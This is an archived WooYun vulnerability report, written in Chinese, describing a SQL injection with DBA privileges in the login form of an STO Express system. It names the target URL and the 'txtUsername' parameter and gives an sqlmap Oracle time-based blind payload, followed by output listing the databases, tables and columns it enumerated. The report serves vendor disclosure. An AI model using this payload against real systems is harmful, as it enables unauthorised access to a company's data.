乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-18: 细节已通知厂商并且等待厂商处理中 2014-12-18: 厂商已经确认,细节仅向厂商公开 2014-12-28: 细节向核心白帽子及相关领域专家公开 2015-01-07: 细节向普通白帽子公开 2015-01-17: 细节向实习白帽子公开 2015-02-01: 细节向公众公开
申通快递某系统SQL注入,DBA权限
wooyun以前有个和该系统相关的洞 WooYun: 申通快递运维平台登陆框注入及源码泄漏 POST注入点:http://bq.sto.cn/Login.aspx注入参数:txtUsername
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: txtUsername (POST) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: __VIEWSTATE=/wEPDwUKLTIxNTQ5Mzc5N2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCGJ0bkxvZ2luOuRt537R02BUqhHXVkPpFql7P+4=&txtUsername=sKwn' AND 2938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(78)||CHR(109)||CHR(86),60) AND 'FOfy'='FOfy&btnLogin.x=1&btnLogin.y=1&txtPass=VZfZ---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Oraclecurrent user is DBA: Trueavailable databases [19]:[*] "CTXSYS\X11"[*] "EXP\X11"[*] "TSMS]S"[*] DBSNMP[*] DMSYS[*] EXFSYS[*] EXP_SYNC[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] STO[*] SYS[*] SYSMAN[*] SYSTEM[*] TEST[*] WMSYS[*] XDBSTO库中有11个表:Database: STO[11 tables]+------------------------------------------------------------------+| MLOG$_TAB_营掖\\?CD\\?F8\\?B5\\?E3\\?B1\\?ED || TAB_\\?B0\\?CD歉\\?C0\\?E0\\?D0\\?CD\\?B1\\?ED || TAB_\\?B8\\?B6\\?BF\\?EE\\?B7\\?BD式\\?B1\\?ED || TAB_\\?B9\\?AB司员\\?B9\\?A4\\?B1\\?ED || TAB_\\?BF\\?EC\\?BC\\?FE\\?C0\\?E0\\?D0\\?CD\\?B1\\?ED || TAB_\\?C1\\?F4\\?B2\\?D6\\?BC\\?FE原\\?D2\\?F2\\?B1\\?ED || TAB_\\?CE\\?CA\\?CC\\?E2\\?BC\\?FE\\?C0\\?E0\\?D0\\?CD || TAB_\\?CE\\?EF品\\?C0\\?E0\\?B1\\?F0\\?B1\\?ED || TAB_\\?D6\\?D0转\\?B2\\?BF\\?B7\\?A2\\?BC\\?FE路\\?D3\\?C9\\?B1\\?ED || TAB_目\\?B5\\?C4\\?B5\\?D8\\?B1\\?ED || TAB_营掖\\?CD\\?F8\\?B5\\?E3\\?B1\\?ED |+------------------------------------------------------------------+
随便选择一个表:
Table: TAB_\\?CE\\?CA\\?CC\\?E2\\?BC\\?FE\\?C0\\?E0\\?D0\\?CD[19 columns]+--------------------------+-------------+| Column | Type |+--------------------------+-------------+| AUTHOR_NUM | non-numeric || AVA_PROFESSOR | non-numeric || C_DIARY_COMMENT_LOG_ID | non-numeric || CANANYONEDISCOVERJID | non-numeric || CARDNUMBER | non-numeric || CT_ID | non-numeric || DELAY | non-numeric || HISTORY_ID | non-numeric || ICONID | non-numeric || IDMEDICOFAMIGLIA | non-numeric || IDSTELLE | non-numeric || NODE_ID | non-numeric || P_ASSWORD | non-numeric || SECTION_VALUE | non-numeric || SESSION_MEMBER_LOGIN_KEY | non-numeric || SKLEP2 | non-numeric || TIDCLASFISCAIS | non-numeric || TRIGGERTEMPLATEID | non-numeric || VERSION_MIN | non-numeric |+--------------------------+-------------+
就不跑其他的库和表了。。。
危害等级:中
漏洞Rank:10
确认时间:2014-12-18 17:26
谢谢
暂无